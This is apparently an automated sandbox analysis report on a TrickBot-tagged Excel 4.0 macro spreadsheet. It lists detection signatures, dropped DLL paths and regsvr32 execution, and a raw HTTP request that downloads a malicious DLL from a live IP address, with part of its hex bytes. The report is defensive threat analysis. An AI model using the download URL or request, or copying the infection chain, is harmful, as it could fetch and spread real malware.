Analysis Report Order_Summary-9632850.xlsb

Overview

General Information

Sample Name:	Order_Summary-9632850.xlsb
Analysis ID:	432380
MD5:	d091fb57338164acff3bd648a1782fd9
SHA1:	ca63bade67055580f6be380cd41bb98affd5de49
SHA256:	12bbd7661b6fd48f3552101588625bde0709dd68b28a0677d000a02389e3b812
Tags:	sat1TrickBotxlsbxlsx
Infos:
Most interesting Screenshot:

Detection

Hidden Macro 4.0

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (creates forbidden files)

Document exploit detected (drops PE files)

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Document exploit detected (UrlDownloadToFile)

Document exploit detected (process start blacklist hit)

Drops PE files to the user root directory

Found Excel 4.0 Macro with suspicious formulas

Office process drops PE file

Sigma detected: Microsoft Office Product Spawning Windows Shell

Abnormal high CPU Usage

Antivirus or Machine Learning detection for unpacked file

Contains functionality to dynamically determine API calls

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Found dropped PE file which has not been started or loaded

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Registers a DLL

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Xls With Macro 4.0

Classification

Signatures

AV Detection:

Antivirus or Machine Learning detection for unpacked file

Source: 3.2.regsvr32.exe.2c00000.2.unpack

Avira: Label: TR/Dropper.Gen

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Software Vulnerabilities:

Document exploit detected (creates forbidden files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\sat1_0609_2[1].dll			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	File created: C:\Users\user\kdldyeff.dll			Jump to behavior

Document exploit detected (drops PE files)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: sat1_0609_2[1].dll.0.dr

Jump to dropped file

Document exploit detected (UrlDownloadToFile)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Section loaded: unknown origin: URLDownloadToFileA

Jump to behavior

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Process created: C:\Windows\SysWOW64\regsvr32.exe

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.3:49715 -> 185.180.199.121:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.3:49715 -> 185.180.199.121:80

Networking:

Downloads executable code via HTTP

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 10 Jun 2021 06:47:07 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.3.28Last-Modified: Wed, 09 Jun 2021 20:56:10 GMTETag: "803e0-5c45b81110e80"Accept-Ranges: bytesContent-Length: 525280Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/octet-streamData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 de a0 b9 12 9a c1 d7 41 9a c1 d7 41 9a c1 d7 41 cc de c4 41 bf c1 d7 41 9a c1 d7 41 a2 c1 d7 41 f8 de c4 41 89 c1 d7 41 9a c1 d6 41 53 c0 d7 41 19 dd d9 41 81 c1 d7 41 72 de dd 41 16 c1 d7 41 22 c7 d1 41 9b c1 d7 41 72 de dc 41 c7 c1 d7 41 72 de d3 41 9b c1 d7 41 52 69 63 68 9a c1 d7 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 93 84 74 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 06 00 00 40 02 00 00 d0 05 00 00 00 00 00 d9 bd 00 00 00 10 00 00 00 50 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 08 00 00 10 00 00 64 dd 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 db 02 00 55 00 00 00 b8 c0 02 00 f0 00 00 00 00 50 03 00 b8 69 04 00 00 00 00 00 00 00 00 00 00 e0 07 00 e0 23 00 00 00 c0 07 00 b8 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 02 00 14 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a7 37 02 00 00 10 00 00 00 40 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b5 8b 00 00 00 50 02 00 00 90 00 00 00 50 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e8 63 00 00 00 e0 02 00 00 30 00 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 69 04 00 00 50 03 00 00 70 04 00 00 10 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d2 5f 00 00 00 c0 07 00 00 60 00 00 00 80 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Uses a known web browser user agent for HTTP communication

Source: global traffic

HTTP traffic detected: GET /sat1_0609_2.dll HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.180.199.121Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121
Source: unknown	TCP traffic detected without corresponding DNS query: 185.180.199.121

Source: global traffic

Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.aadrm.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.addins.store.office.com/app/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.office.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.onedrive.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://augloop.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://augloop.office.com/v2
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.entity.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://config.edge.skype.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cortana.ai/api
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://cr.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.o365filtering.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dev.cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://dev0-api.acompli.net/autodetect
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://devnull.onenote.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://directory.services.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ecs.office.com/config/v2/Office
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://entitlement.diagnostics.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://entitlement.diagnosticssdf.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://globaldisco.crm.dynamics.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.ppe.windows.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.ppe.windows.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.windows.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://graph.windows.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&premium=1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&premium=1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&premium=1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://incidents.diagnostics.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://incidents.diagnosticssdf.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://insertmedia.bing.office.net/odc/insertmedia
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://lifecycle.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.microsoftonline.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows-ppe.net/common/oauth2/authorize
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows.local
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://login.windows.net/common/oauth2/authorize
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://management.azure.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://management.azure.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://messaging.office.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ncus.contentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ncus.pagecontentsync.
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ocos-office365-s2s.msedge.net/ab
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ofcrecsvcapi-int.azurewebsites.net/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officeapps.live.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officeci.azurewebsites.net/api/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://officesetup.getmicrosoftkey.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://onedrive.live.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://onedrive.live.com/embed?
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office365.com/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pages.store.office.com/review/query
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://powerlift.acompli.net
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: sat1_0609_2[1].dll.0.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://settings.outlook.com
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://shell.suite.office.com:1443
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://skyapi.live.net/Activity/
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://staging.cortana.ai
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: B709A3E3-2143-4926-A150-50001F594891.0.dr	String found in binary or memory: https://store.office.cn/addinstemplate
